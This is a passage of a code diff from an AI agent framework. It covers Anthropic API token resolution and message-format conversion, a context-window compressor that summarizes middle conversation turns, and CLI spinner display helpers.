logger.debug("Failed to refresh Claude Code token: %s", e)
return None
def _write_claude_code_credentials(access_token: str, refresh_token: str, expires_at_ms: int) -> None:
"""Write refreshed credentials back to ~/.claude/.credentials.json."""
cred_path = Path.home() / ".claude" / ".credentials.json"
try:
# Read existing file to preserve other fields
existing = {}
if cred_path.exists():
existing = json.loads(cred_path.read_text(encoding="utf-8"))
existing["claudeAiOauth"] = {
"accessToken": access_token,
"refreshToken": refresh_token,
"expiresAt": expires_at_ms,
}
cred_path.parent.mkdir(parents=True, exist_ok=True)
cred_path.write_text(json.dumps(existing, indent=2), encoding="utf-8")
# Restrict permissions (credentials file)
cred_path.chmod(0o600)
except (OSError, IOError) as e:
logger.debug("Failed to write refreshed credentials: %s", e)
def resolve_anthropic_token() -> Optional[str]:
"""Resolve an Anthropic token from all available sources.
Priority:
1. ANTHROPIC_TOKEN env var (OAuth/setup token saved by Hermes)
2. CLAUDE_CODE_OAUTH_TOKEN env var
3. Claude Code credentials (~/.claude.json or ~/.claude/.credentials.json)
— with automatic refresh if expired and a refresh token is available
4. ANTHROPIC_API_KEY env var (regular API key, or legacy fallback)
Returns the token string or None.
"""
# 1. Hermes-managed OAuth/setup token env var
token = os.getenv("ANTHROPIC_TOKEN", "").strip()
if token:
return token
# 2. CLAUDE_CODE_OAUTH_TOKEN (used by Claude Code for setup-tokens)
cc_token = os.getenv("CLAUDE_CODE_OAUTH_TOKEN", "").strip()
if cc_token:
return cc_token
# 3. Claude Code credential file
creds = read_claude_code_credentials()
if creds and is_claude_code_token_valid(creds):
logger.debug("Using Claude Code credentials (auto-detected)")
return creds["accessToken"]
elif creds:
# Token expired — attempt to refresh
logger.debug("Claude Code credentials expired — attempting refresh")
refreshed = _refresh_oauth_token(creds)
if refreshed:
return refreshed
logger.debug("Token refresh failed — re-run 'claude setup-token' to reauthenticate")
# 4. Regular API key, or a legacy OAuth token saved in ANTHROPIC_API_KEY.
# This remains as a compatibility fallback for pre-migration Hermes configs.
api_key = os.getenv("ANTHROPIC_API_KEY", "").strip()
if api_key:
return api_key
return None
def run_oauth_setup_token() -> Optional[str]:
"""Run 'claude setup-token' interactively and return the resulting token.
Checks multiple sources after the subprocess completes:
1. Claude Code credential files (may be written by the subprocess)
2. CLAUDE_CODE_OAUTH_TOKEN / ANTHROPIC_TOKEN env vars
Returns the token string, or None if no credentials were obtained.
Raises FileNotFoundError if the 'claude' CLI is not installed.
"""
import shutil
import subprocess
claude_path = shutil.which("claude")
if not claude_path:
raise FileNotFoundError(
"The 'claude' CLI is not installed. "
"Install it with: npm install -g @anthropic-ai/claude-code"
)
# Run interactively — stdin/stdout/stderr inherited so user can interact
try:
subprocess.run([claude_path, "setup-token"])
except (KeyboardInterrupt, EOFError):
return None
# Check if credentials were saved to Claude Code's config files
creds = read_claude_code_credentials()
if creds and is_claude_code_token_valid(creds):
return creds["accessToken"]
# Check env vars that may have been set
for env_var in ("CLAUDE_CODE_OAUTH_TOKEN", "ANTHROPIC_TOKEN"):
val = os.getenv(env_var, "").strip()
if val:
return val
return None
# ---------------------------------------------------------------------------
# Message / tool / response format conversion
# ---------------------------------------------------------------------------
def normalize_model_name(model: str) -> str:
"""Normalize a model name for the Anthropic API.
- Strips 'anthropic/' prefix (OpenRouter format, case-insensitive)
- Converts dots to hyphens in version numbers (OpenRouter uses dots,
Anthropic uses hyphens: claude-opus-4.6 → claude-opus-4-6)
"""
lower = model.lower()
if lower.startswith("anthropic/"):
model = model[len("anthropic/"):]
# OpenRouter uses dots for version separators (claude-opus-4.6),
# Anthropic uses hyphens (claude-opus-4-6). Convert dots to hyphens.
model = model.replace(".", "-")
return model
def _sanitize_tool_id(tool_id: str) -> str:
"""Sanitize a tool call ID for the Anthropic API.
Anthropic requires IDs matching [a-zA-Z0-9_-]. Replace invalid
characters with underscores and ensure non-empty.
"""
import re
if not tool_id:
return "tool_0"
sanitized = re.sub(r"[^a-zA-Z0-9_-]", "_", tool_id)
return sanitized or "tool_0"
def convert_tools_to_anthropic(tools: List[Dict]) -> List[Dict]:
"""Convert OpenAI tool definitions to Anthropic format."""
if not tools:
return []
result = []
for t in tools:
fn = t.get("function", {})
result.append({
"name": fn.get("name", ""),
"description": fn.get("description", ""),
"input_schema": fn.get("parameters", {"type": "object", "properties": {}}),
})
return result
def convert_messages_to_anthropic(
messages: List[Dict],
) -> Tuple[Optional[Any], List[Dict]]:
"""Convert OpenAI-format messages to Anthropic format.
Returns (system_prompt, anthropic_messages).
System messages are extracted since Anthropic takes them as a separate param.
system_prompt is a string or list of content blocks (when cache_control present).
"""
system = None
result = []
for m in messages:
role = m.get("role", "user")
content = m.get("content", "")
if role == "system":
if isinstance(content, list):
# Preserve cache_control markers on content blocks
has_cache = any(
p.get("cache_control") for p in content if isinstance(p, dict)
)
if has_cache:
system = [p for p in content if isinstance(p, dict)]
else:
system = "\n".join(
p["text"] for p in content if p.get("type") == "text"
)
else:
system = content
continue
if role == "assistant":
blocks = []
if content:
text = content if isinstance(content, str) else json.dumps(content)
blocks.append({"type": "text", "text": text})
for tc in m.get("tool_calls", []):
fn = tc.get("function", {})
args = fn.get("arguments", "{}")
try:
parsed_args = json.loads(args) if isinstance(args, str) else args
except (json.JSONDecodeError, ValueError):
parsed_args = {}
blocks.append({
"type": "tool_use",
"id": _sanitize_tool_id(tc.get("id", "")),
"name": fn.get("name", ""),
"input": parsed_args,
})
# Anthropic rejects empty assistant content
effective = blocks or content
if not effective or effective == "":
effective = [{"type": "text", "text": "(empty)"}]
result.append({"role": "assistant", "content": effective})
continue
if role == "tool":
# Sanitize tool_use_id and ensure non-empty content
result_content = content if isinstance(content, str) else json.dumps(content)
if not result_content:
result_content = "(no output)"
tool_result = {
"type": "tool_result",
"tool_use_id": _sanitize_tool_id(m.get("tool_call_id", "")),
"content": result_content,
}
# Merge consecutive tool results into one user message
if (
result
and result[-1]["role"] == "user"
and isinstance(result[-1]["content"], list)
and result[-1]["content"]
and result[-1]["content"][0].get("type") == "tool_result"
):
result[-1]["content"].append(tool_result)
else:
result.append({"role": "user", "content": [tool_result]})
continue
# Regular user message
result.append({"role": "user", "content": content})
# Strip orphaned tool_use blocks (no matching tool_result follows)
tool_result_ids = set()
for m in result:
if m["role"] == "user" and isinstance(m["content"], list):
for block in m["content"]:
if block.get("type") == "tool_result":
tool_result_ids.add(block.get("tool_use_id"))
for m in result:
if m["role"] == "assistant" and isinstance(m["content"], list):
m["content"] = [
b
for b in m["content"]
if b.get("type") != "tool_use" or b.get("id") in tool_result_ids
]
if not m["content"]:
m["content"] = [{"type": "text", "text": "(tool call removed)"}]
# Enforce strict role alternation (Anthropic rejects consecutive same-role messages)
fixed = []
for m in result:
if fixed and fixed[-1]["role"] == m["role"]:
if m["role"] == "user":
# Merge consecutive user messages
prev_content = fixed[-1]["content"]
curr_content = m["content"]
if isinstance(prev_content, str) and isinstance(curr_content, str):
fixed[-1]["content"] = prev_content + "\n" + curr_content
elif isinstance(prev_content, list) and isinstance(curr_content, list):
fixed[-1]["content"] = prev_content + curr_content
else:
# Mixed types — wrap string in list
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(curr_content, str):
curr_content = [{"type": "text", "text": curr_content}]
fixed[-1]["content"] = prev_content + curr_content
else:
# Consecutive assistant messages — merge text content
prev_blocks = fixed[-1]["content"]
curr_blocks = m["content"]
if isinstance(prev_blocks, list) and isinstance(curr_blocks, list):
fixed[-1]["content"] = prev_blocks + curr_blocks
elif isinstance(prev_blocks, str) and isinstance(curr_blocks, str):
fixed[-1]["content"] = prev_blocks + "\n" + curr_blocks
else:
# Keep the later message
fixed[-1] = m
else:
fixed.append(m)
result = fixed
return system, result
def build_anthropic_kwargs(
model: str,
messages: List[Dict],
tools: Optional[List[Dict]],
max_tokens: Optional[int],
reasoning_config: Optional[Dict[str, Any]],
tool_choice: Optional[str] = None,
) -> Dict[str, Any]:
"""Build kwargs for anthropic.messages.create()."""
system, anthropic_messages = convert_messages_to_anthropic(messages)
anthropic_tools = convert_tools_to_anthropic(tools) if tools else []
model = normalize_model_name(model)
effective_max_tokens = max_tokens or 16384
kwargs: Dict[str, Any] = {
"model": model,
"messages": anthropic_messages,
"max_tokens": effective_max_tokens,
}
if system:
kwargs["system"] = system
if anthropic_tools:
kwargs["tools"] = anthropic_tools
# Map OpenAI tool_choice to Anthropic format
if tool_choice == "auto" or tool_choice is None:
kwargs["tool_choice"] = {"type": "auto"}
elif tool_choice == "required":
kwargs["tool_choice"] = {"type": "any"}
elif tool_choice == "none":
pass # Don't send tool_choice — Anthropic will use tools if needed
elif isinstance(tool_choice, str):
# Specific tool name
kwargs["tool_choice"] = {"type": "tool", "name": tool_choice}
# Map reasoning_config to Anthropic's thinking parameter.
# Claude 4.6 models use adaptive thinking + output_config.effort.
# Older models use manual thinking with budget_tokens.
# Haiku models do NOT support extended thinking at all — skip entirely.
if reasoning_config and isinstance(reasoning_config, dict):
if reasoning_config.get("enabled") is not False and "haiku" not in model.lower():
effort = str(reasoning_config.get("effort", "medium")).lower()
budget = THINKING_BUDGET.get(effort, 8000)
if _supports_adaptive_thinking(model):
kwargs["thinking"] = {"type": "adaptive"}
kwargs["output_config"] = {
"effort": ADAPTIVE_EFFORT_MAP.get(effort, "medium")
}
else:
kwargs["thinking"] = {"type": "enabled", "budget_tokens": budget}
# Anthropic requires temperature=1 when thinking is enabled on older models
kwargs["temperature"] = 1
kwargs["max_tokens"] = max(effective_max_tokens, budget + 4096)
return kwargs
def normalize_anthropic_response(
response,
) -> Tuple[SimpleNamespace, str]:
"""Normalize Anthropic response to match the shape expected by AIAgent.
Returns (assistant_message, finish_reason) where assistant_message has
.content, .tool_calls, and .reasoning attributes.
"""
text_parts = []
reasoning_parts = []
tool_calls = []
for block in response.content:
if block.type == "text":
text_parts.append(block.text)
elif block.type == "thinking":
reasoning_parts.append(block.thinking)
elif block.type == "tool_use":
tool_calls.append(
SimpleNamespace(
id=block.id,
type="function",
function=SimpleNamespace(
name=block.name,
arguments=json.dumps(block.input),
),
)
)
# Map Anthropic stop_reason to OpenAI finish_reason
stop_reason_map = {
"end_turn": "stop",
"tool_use": "tool_calls",
"max_tokens": "length",
"stop_sequence": "stop",
}
finish_reason = stop_reason_map.get(response.stop_reason, "stop")
return (
SimpleNamespace(
content="\n".join(text_parts) if text_parts else None,
tool_calls=tool_calls or None,
reasoning="\n\n".join(reasoning_parts) if reasoning_parts else None,
reasoning_content=None,
reasoning_details=None,
),
finish_reason,
)

1054
agent/auxiliary_client.py Normal file

File diff suppressed because it is too large Load Diff

420
agent/context_compressor.py Normal file
View File

@@ -0,0 +1,420 @@
"""Automatic context window compression for long conversations.
Self-contained class with its own OpenAI client for summarization.
Uses Gemini Flash (cheap/fast) to summarize middle turns while
protecting head and tail context.
"""
import logging
import os
from typing import Any, Dict, List, Optional, Tuple
from agent.auxiliary_client import call_llm
from agent.model_metadata import (
get_model_context_length,
estimate_messages_tokens_rough,
)
logger = logging.getLogger(__name__)
NEVER_PRUNE_TOOLS = {"clarify", "memory", "skill_view", "todo", "read_file"}
def _adaptive_prune_protect(context_length: int) -> int:
"""Scale the recent-tool-output protection window to the model context size."""
if context_length >= 500_000:
return 100_000
if context_length >= 128_000:
return 40_000
if context_length >= 64_000:
return 20_000
return 10_000
def _adaptive_prune_minimum(context_length: int) -> int:
"""Only prune when it reclaims a meaningful amount of prompt budget."""
return max(5_000, context_length // 20)
class ContextCompressor:
"""Compresses conversation context when approaching the model's context limit.
Algorithm: protect first N + last N turns, summarize everything in between.
Token tracking uses actual counts from API responses for accuracy.
"""
def __init__(
self,
model: str,
threshold_percent: float = 0.50,
protect_first_n: int = 3,
protect_last_n: int = 4,
summary_target_tokens: int = 2500,
quiet_mode: bool = False,
summary_model_override: str = None,
base_url: str = "",
):
self.model = model
self.base_url = base_url
self.threshold_percent = threshold_percent
self.protect_first_n = protect_first_n
self.protect_last_n = protect_last_n
self.summary_target_tokens = summary_target_tokens
self.quiet_mode = quiet_mode
self.context_length = get_model_context_length(model, base_url=base_url)
self.threshold_tokens = int(self.context_length * threshold_percent)
self.compression_count = 0
self._context_probed = False # True after a step-down from context error
self.last_prompt_tokens = 0
self.last_completion_tokens = 0
self.last_total_tokens = 0
self.summary_model = summary_model_override or ""
self._prune_protect_tokens = _adaptive_prune_protect(self.context_length)
self._prune_minimum_tokens = _adaptive_prune_minimum(self.context_length)
self._prune_runway_tokens = max(self._prune_minimum_tokens, int(self.threshold_tokens * 0.15))
self._prune_target_tokens = max(0, self.threshold_tokens - self._prune_runway_tokens)
def update_from_response(self, usage: Dict[str, Any]):
"""Update tracked token usage from API response."""
self.last_prompt_tokens = usage.get("prompt_tokens", 0)
self.last_completion_tokens = usage.get("completion_tokens", 0)
self.last_total_tokens = usage.get("total_tokens", 0)
def should_compress(self, prompt_tokens: int = None) -> bool:
"""Check if context exceeds the compression threshold."""
tokens = prompt_tokens if prompt_tokens is not None else self.last_prompt_tokens
return tokens >= self.threshold_tokens
def should_compress_preflight(self, messages: List[Dict[str, Any]]) -> bool:
"""Quick pre-flight check using rough estimate (before API call)."""
rough_estimate = estimate_messages_tokens_rough(messages)
return rough_estimate >= self.threshold_tokens
def get_status(self) -> Dict[str, Any]:
"""Get current compression status for display/logging."""
return {
"last_prompt_tokens": self.last_prompt_tokens,
"threshold_tokens": self.threshold_tokens,
"context_length": self.context_length,
"usage_percent": (self.last_prompt_tokens / self.context_length * 100) if self.context_length else 0,
"compression_count": self.compression_count,
}
def _is_protected_tool(self, message: Dict[str, Any]) -> bool:
"""Return True when a tool output should never be pruned."""
return (message.get("name") or "") in NEVER_PRUNE_TOOLS
def _prune_tool_outputs(self, messages: List[Dict[str, Any]]) -> Tuple[List[Dict[str, Any]], int]:
"""Replace older middle tool outputs with compact placeholders.
Only prunes tool outputs from the same middle region that would be eligible
for summarization. The head/tail protected windows are left untouched.
Returns:
(messages_after_prune, chars_saved)
"""
n_messages = len(messages)
compress_start = self.protect_first_n
compress_end = n_messages - self.protect_last_n
if compress_start >= compress_end:
return messages, 0
compress_start = self._align_boundary_forward(messages, compress_start)
compress_end = self._align_boundary_backward(messages, compress_end)
if compress_start >= compress_end:
return messages, 0
pruned = [msg.copy() for msg in messages]
chars_saved = 0
recent_tool_tokens = 0
for i in range(compress_end - 1, compress_start - 1, -1):
msg = pruned[i]
if msg.get("role") != "tool" or self._is_protected_tool(msg):
continue
content = msg.get("content")
content_text = content if isinstance(content, str) else str(content or "")
token_estimate = max(1, len(content_text) // 4)
if recent_tool_tokens < self._prune_protect_tokens:
recent_tool_tokens += token_estimate
continue
original_len = len(content_text)
placeholder = f"[Tool output pruned — was {original_len:,} chars]"
pruned[i]["content"] = placeholder
chars_saved += max(0, original_len - len(placeholder))
tokens_saved = chars_saved // 4
if tokens_saved < self._prune_minimum_tokens:
return messages, 0
return pruned, chars_saved
def _generate_summary(self, turns_to_summarize: List[Dict[str, Any]]) -> Optional[str]:
"""Generate a concise summary of conversation turns.
Tries the auxiliary model first, then falls back to the user's main
model. Returns None if all attempts fail — the caller should drop
the middle turns without a summary rather than inject a useless
placeholder.
"""
parts = []
for msg in turns_to_summarize:
role = msg.get("role", "unknown")
content = msg.get("content") or ""
if len(content) > 2000:
content = content[:1000] + "\n...[truncated]...\n" + content[-500:]
tool_calls = msg.get("tool_calls", [])
if tool_calls:
tool_names = [tc.get("function", {}).get("name", "?") for tc in tool_calls if isinstance(tc, dict)]
content += f"\n[Tool calls: {', '.join(tool_names)}]"
parts.append(f"[{role.upper()}]: {content}")
content_to_summarize = "\n\n".join(parts)
prompt = f"""Summarize these conversation turns concisely. This summary will replace these turns in the conversation history.
Write from a neutral perspective describing:
1. What actions were taken (tool calls, searches, file operations)
2. Key information or results obtained
3. Important decisions or findings
4. Relevant data, file names, or outputs
Keep factual and informative. Target ~{self.summary_target_tokens} tokens.
---
TURNS TO SUMMARIZE:
{content_to_summarize}
---
Write only the summary, starting with "[CONTEXT SUMMARY]:" prefix."""
# Use the centralized LLM router — handles provider resolution,
# auth, and fallback internally.
try:
call_kwargs = {
"task": "compression",
"messages": [{"role": "user", "content": prompt}],
"temperature": 0.3,
"max_tokens": self.summary_target_tokens * 2,
"timeout": 30.0,
}
if self.summary_model:
call_kwargs["model"] = self.summary_model
response = call_llm(**call_kwargs)
summary = response.choices[0].message.content.strip()
if not summary.startswith("[CONTEXT SUMMARY]:"):
summary = "[CONTEXT SUMMARY]: " + summary
return summary
except RuntimeError:
logging.warning("Context compression: no provider available for "
"summary. Middle turns will be dropped without summary.")
return None
except Exception as e:
logging.warning("Failed to generate context summary: %s", e)
return None
# ------------------------------------------------------------------
# Tool-call / tool-result pair integrity helpers
# ------------------------------------------------------------------
@staticmethod
def _get_tool_call_id(tc) -> str:
"""Extract the call ID from a tool_call entry (dict or SimpleNamespace)."""
if isinstance(tc, dict):
return tc.get("id", "")
return getattr(tc, "id", "") or ""
def _sanitize_tool_pairs(self, messages: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""Fix orphaned tool_call / tool_result pairs after compression.
Two failure modes:
1. A tool *result* references a call_id whose assistant tool_call was
removed (summarized/truncated). The API rejects this with
"No tool call found for function call output with call_id ...".
2. An assistant message has tool_calls whose results were dropped.
The API rejects this because every tool_call must be followed by
a tool result with the matching call_id.
This method removes orphaned results and inserts stub results for
orphaned calls so the message list is always well-formed.
"""
surviving_call_ids: set = set()
for msg in messages:
if msg.get("role") == "assistant":
for tc in msg.get("tool_calls") or []:
cid = self._get_tool_call_id(tc)
if cid:
surviving_call_ids.add(cid)
result_call_ids: set = set()
for msg in messages:
if msg.get("role") == "tool":
cid = msg.get("tool_call_id")
if cid:
result_call_ids.add(cid)
# 1. Remove tool results whose call_id has no matching assistant tool_call
orphaned_results = result_call_ids - surviving_call_ids
if orphaned_results:
messages = [
m for m in messages
if not (m.get("role") == "tool" and m.get("tool_call_id") in orphaned_results)
]
if not self.quiet_mode:
logger.info("Compression sanitizer: removed %d orphaned tool result(s)", len(orphaned_results))
# 2. Add stub results for assistant tool_calls whose results were dropped
missing_results = surviving_call_ids - result_call_ids
if missing_results:
patched: List[Dict[str, Any]] = []
for msg in messages:
patched.append(msg)
if msg.get("role") == "assistant":
for tc in msg.get("tool_calls") or []:
cid = self._get_tool_call_id(tc)
if cid in missing_results:
patched.append({
"role": "tool",
"content": "[Result from earlier conversation — see context summary above]",
"tool_call_id": cid,
})
messages = patched
if not self.quiet_mode:
logger.info("Compression sanitizer: added %d stub tool result(s)", len(missing_results))
return messages
def _align_boundary_forward(self, messages: List[Dict[str, Any]], idx: int) -> int:
"""Push a compress-start boundary forward past any orphan tool results.
If ``messages[idx]`` is a tool result, slide forward until we hit a
non-tool message so we don't start the summarised region mid-group.
"""
while idx < len(messages) and messages[idx].get("role") == "tool":
idx += 1
return idx
def _align_boundary_backward(self, messages: List[Dict[str, Any]], idx: int) -> int:
"""Pull a compress-end boundary backward to avoid splitting a
tool_call / result group.
If the message just before ``idx`` is an assistant message with
tool_calls, those tool results will start at ``idx`` and would be
separated from their parent. Move backwards to include the whole
group in the summarised region.
"""
if idx <= 0 or idx >= len(messages):
return idx
prev = messages[idx - 1]
if prev.get("role") == "assistant" and prev.get("tool_calls"):
# The results for this assistant turn sit at idx..idx+k.
# Include the assistant message in the summarised region too.
idx -= 1
return idx
def compress(self, messages: List[Dict[str, Any]], current_tokens: int = None) -> List[Dict[str, Any]]:
"""Compress conversation messages by summarizing middle turns.
Keeps first N + last N turns, summarizes everything in between.
After compression, orphaned tool_call / tool_result pairs are cleaned
up so the API never receives mismatched IDs.
"""
n_messages = len(messages)
if n_messages <= self.protect_first_n + self.protect_last_n + 1:
if not self.quiet_mode:
print(f"⚠️ Cannot compress: only {n_messages} messages (need > {self.protect_first_n + self.protect_last_n + 1})")
return messages
compress_start = self.protect_first_n
compress_end = n_messages - self.protect_last_n
if compress_start >= compress_end:
return messages
# Adjust boundaries to avoid splitting tool_call/result groups.
compress_start = self._align_boundary_forward(messages, compress_start)
compress_end = self._align_boundary_backward(messages, compress_end)
if compress_start >= compress_end:
return messages
display_tokens = current_tokens if current_tokens is not None else self.last_prompt_tokens or estimate_messages_tokens_rough(messages)
if not self.quiet_mode:
print(f"\n📦 Context compression triggered ({display_tokens:,} tokens ≥ {self.threshold_tokens:,} threshold)")
print(f" 📊 Model context limit: {self.context_length:,} tokens ({self.threshold_percent*100:.0f}% = {self.threshold_tokens:,})")
pruned_messages, chars_saved = self._prune_tool_outputs(messages)
if chars_saved > 0:
pruned_tokens = estimate_messages_tokens_rough(pruned_messages)
tokens_saved_phase1 = max(0, display_tokens - pruned_tokens)
if not self.quiet_mode:
print(
f" ✂️ Phase 1 (prune): removed {chars_saved:,} chars of old tool outputs "
f"(~{tokens_saved_phase1:,} tokens saved)"
)
if pruned_tokens <= self._prune_target_tokens:
self.compression_count += 1
pruned_messages = self._sanitize_tool_pairs(pruned_messages)
if not self.quiet_mode:
print(
f" ✅ Phase 1 sufficient: {n_messages}{len(pruned_messages)} messages, "
f"now {pruned_tokens:,} tokens"
)
print(f" 💡 Compression #{self.compression_count} complete (prune only — no LLM call needed)")
return pruned_messages
if not self.quiet_mode and pruned_tokens < self.threshold_tokens:
print(
f" ↪️ Phase 1 recovered tokens but not enough runway "
f"({pruned_tokens:,} > target {self._prune_target_tokens:,}); continuing to compaction"
)
messages = pruned_messages
n_messages = len(messages)
compress_start = self.protect_first_n
compress_end = n_messages - self.protect_last_n
if compress_start >= compress_end:
return messages
compress_start = self._align_boundary_forward(messages, compress_start)
compress_end = self._align_boundary_backward(messages, compress_end)
if compress_start >= compress_end:
return messages
turns_to_summarize = messages[compress_start:compress_end]
if not self.quiet_mode:
print(f" 🗜️ Summarizing turns {compress_start+1}-{compress_end} ({len(turns_to_summarize)} turns)")
summary = self._generate_summary(turns_to_summarize)
compressed = []
for i in range(compress_start):
msg = messages[i].copy()
if i == 0 and msg.get("role") == "system" and self.compression_count == 0:
msg["content"] = (msg.get("content") or "") + "\n\n[Note: Some earlier conversation turns may be summarized to preserve context space.]"
compressed.append(msg)
if summary:
last_head_role = messages[compress_start - 1].get("role", "user") if compress_start > 0 else "user"
summary_role = "user" if last_head_role in ("assistant", "tool") else "assistant"
compressed.append({"role": summary_role, "content": summary})
else:
if not self.quiet_mode:
print(" ⚠️ No summary model available — middle turns dropped without summary")
for i in range(compress_end, n_messages):
compressed.append(messages[i].copy())
self.compression_count += 1
compressed = self._sanitize_tool_pairs(compressed)
if not self.quiet_mode:
new_estimate = estimate_messages_tokens_rough(compressed)
saved_estimate = display_tokens - new_estimate
print(f" ✅ Compressed: {n_messages}{len(compressed)} messages (~{saved_estimate:,} tokens saved)")
print(f" 💡 Compression #{self.compression_count} complete")
return compressed

585
agent/display.py Normal file
View File

@@ -0,0 +1,585 @@
"""CLI presentation -- spinner, kawaii faces, tool preview formatting.
Pure display functions and classes with no AIAgent dependency.
Used by AIAgent._execute_tool_calls for CLI feedback.
"""
import json
import logging
import os
import sys
import threading
import time
# ANSI escape codes for coloring tool failure indicators
_RED = "\033[31m"
_RESET = "\033[0m"
logger = logging.getLogger(__name__)
# =========================================================================
# Skin-aware helpers (lazy import to avoid circular deps)
# =========================================================================
def _get_skin():
"""Get the active skin config, or None if not available."""
try:
from hermes_cli.skin_engine import get_active_skin
return get_active_skin()
except Exception:
return None
def get_skin_faces(key: str, default: list) -> list:
"""Get spinner face list from active skin, falling back to default."""
skin = _get_skin()
if skin:
faces = skin.get_spinner_list(key)
if faces:
return faces
return default
def get_skin_verbs() -> list:
"""Get thinking verbs from active skin."""
skin = _get_skin()
if skin:
verbs = skin.get_spinner_list("thinking_verbs")
if verbs:
return verbs
return KawaiiSpinner.THINKING_VERBS
def get_skin_tool_prefix() -> str:
"""Get tool output prefix character from active skin."""
skin = _get_skin()
if skin:
return skin.tool_prefix
return ""
# =========================================================================
# Tool preview (one-line summary of a tool call's primary argument)
# =========================================================================
def _oneline(text: str) -> str:
"""Collapse whitespace (including newlines) to single spaces."""
return " ".join(text.split())
def build_tool_preview(tool_name: str, args: dict, max_len: int = 40) -> str:
"""Build a short preview of a tool call's primary argument for display."""
if not args:
return None
primary_args = {
"terminal": "command", "web_search": "query", "web_extract": "urls",
"read_file": "path", "write_file": "path", "patch": "path",
"search_files": "pattern", "browser_navigate": "url",
"browser_click": "ref", "browser_type": "text",
"image_generate": "prompt", "text_to_speech": "text",
"vision_analyze": "question", "mixture_of_agents": "user_prompt",
"skill_view": "name", "skills_list": "category",
"schedule_cronjob": "name",
"execute_code": "code", "delegate_task": "goal",
"clarify": "question", "skill_manage": "name",
}
if tool_name == "process":
action = args.get("action", "")
sid = args.get("session_id", "")
data = args.get("data", "")
timeout_val = args.get("timeout")
parts = [action]
if sid:
parts.append(sid[:16])
if data:
parts.append(f'"{_oneline(data[:20])}"')
if timeout_val and action == "wait":
parts.append(f"{timeout_val}s")
return " ".join(parts) if parts else None
if tool_name == "todo":
todos_arg = args.get("todos")
merge = args.get("merge", False)
if todos_arg is None:
return "reading task list"
elif merge:
return f"updating {len(todos_arg)} task(s)"
else:
return f"planning {len(todos_arg)} task(s)"
if tool_name == "session_search":
query = _oneline(args.get("query", ""))
return f"recall: \"{query[:25]}{'...' if len(query) > 25 else ''}\""
if tool_name == "memory":
action = args.get("action", "")
target = args.get("target", "")
if action == "add":
content = _oneline(args.get("content", ""))
return f"+{target}: \"{content[:25]}{'...' if len(content) > 25 else ''}\""
elif action == "replace":
return f"~{target}: \"{_oneline(args.get('old_text', '')[:20])}\""
elif action == "remove":
return f"-{target}: \"{_oneline(args.get('old_text', '')[:20])}\""
return action
if tool_name == "send_message":
target = args.get("target", "?")
msg = _oneline(args.get("message", ""))
if len(msg) > 20:
msg = msg[:17] + "..."
return f"to {target}: \"{msg}\""
if tool_name.startswith("rl_"):
rl_previews = {
"rl_list_environments": "listing envs",
"rl_select_environment": args.get("name", ""),
"rl_get_current_config": "reading config",
"rl_edit_config": f"{args.get('field', '')}={args.get('value', '')}",
"rl_start_training": "starting",
"rl_check_status": args.get("run_id", "")[:16],
"rl_stop_training": f"stopping {args.get('run_id', '')[:16]}",
"rl_get_results": args.get("run_id", "")[:16],
"rl_list_runs": "listing runs",
"rl_test_inference": f"{args.get('num_steps', 3)} steps",
}
return rl_previews.get(tool_name)
key = primary_args.get(tool_name)
if not key:
for fallback_key in ("query", "text", "command", "path", "name", "prompt", "code", "goal"):
if fallback_key in args:
key = fallback_key
break
if not key or key not in args:
return None
value = args[key]
if isinstance(value, list):
value = value[0] if value else ""
preview = _oneline(str(value))
if not preview:
return None
if len(preview) > max_len:
preview = preview[:max_len - 3] + "..."
return preview
# =========================================================================
# KawaiiSpinner
# =========================================================================
class KawaiiSpinner:
"""Animated spinner with kawaii faces for CLI feedback during tool execution."""
SPINNERS = {
'dots': ['', '', '', '', '', '', '', '', '', ''],
'bounce': ['', '', '', '', '', '', '', ''],
'grow': ['', '', '', '', '', '', '', '', '', '', '', '', '', ''],
'arrows': ['', '', '', '', '', '', '', ''],
'star': ['', '', '', '', '', '', '', ''],
'moon': ['🌑', '🌒', '🌓', '🌔', '🌕', '🌖', '🌗', '🌘'],
'pulse': ['', '', '', '', '', ''],
'brain': ['🧠', '💭', '💡', '', '💫', '🌟', '💡', '💭'],
'sparkle': ['', '˚', '*', '', '', '', '*', '˚'],
}
KAWAII_WAITING = [
"(。◕‿◕。)", "(◕‿◕✿)", "٩(◕‿◕。)۶", "(✿◠‿◠)", "( ˘▽˘)っ",
"♪(´ε` )", "(◕ᴗ◕✿)", "ヾ(^∇^)", "(≧◡≦)", "(★ω★)",
]
KAWAII_THINKING = [
"(。•́︿•̀。)", "(◔_◔)", "(¬‿¬)", "( •_•)>⌐■-■", "(⌐■_■)",
"(´・_・`)", "◉_◉", "(°ロ°)", "( ˘⌣˘)♡", "ヽ(>∀<☆)☆",
"٩(๑❛ᴗ❛๑)۶", "(⊙_⊙)", "(¬_¬)", "( ͡° ͜ʖ ͡°)", "ಠ_ಠ",
]
THINKING_VERBS = [
"pondering", "contemplating", "musing", "cogitating", "ruminating",
"deliberating", "mulling", "reflecting", "processing", "reasoning",
"analyzing", "computing", "synthesizing", "formulating", "brainstorming",
]
def __init__(self, message: str = "", spinner_type: str = 'dots'):
self.message = message
self.spinner_frames = self.SPINNERS.get(spinner_type, self.SPINNERS['dots'])
self.running = False
self.thread = None
self.frame_idx = 0
self.start_time = None
self.last_line_len = 0
self._last_flush_time = 0.0 # Rate-limit flushes for patch_stdout compat
# Capture stdout NOW, before any redirect_stdout(devnull) from
# child agents can replace sys.stdout with a black hole.
self._out = sys.stdout
def _write(self, text: str, end: str = '\n', flush: bool = False):
"""Write to the stdout captured at spinner creation time."""
try:
self._out.write(text + end)
if flush:
self._out.flush()
except (ValueError, OSError):
pass
def _animate(self):
# Cache skin wings at start (avoid per-frame imports)
skin = _get_skin()
wings = skin.get_spinner_wings() if skin else []
while self.running:
if os.getenv("HERMES_SPINNER_PAUSE"):
time.sleep(0.1)
continue
frame = self.spinner_frames[self.frame_idx % len(self.spinner_frames)]
elapsed = time.time() - self.start_time
if wings:
left, right = wings[self.frame_idx % len(wings)]
line = f" {left} {frame} {self.message} {right} ({elapsed:.1f}s)"
else:
line = f" {frame} {self.message} ({elapsed:.1f}s)"
pad = max(self.last_line_len - len(line), 0)
# Rate-limit flush() calls to avoid spinner spam under
# prompt_toolkit's patch_stdout. Each flush() pushes a queue
# item that may trigger a separate run_in_terminal() call; if
# items are processed one-at-a-time the \r overwrite is lost
# and every frame appears on its own line. By flushing at
# most every 0.4s we guarantee multiple \r-frames are batched
# into a single write, so the terminal collapses them correctly.
now = time.time()
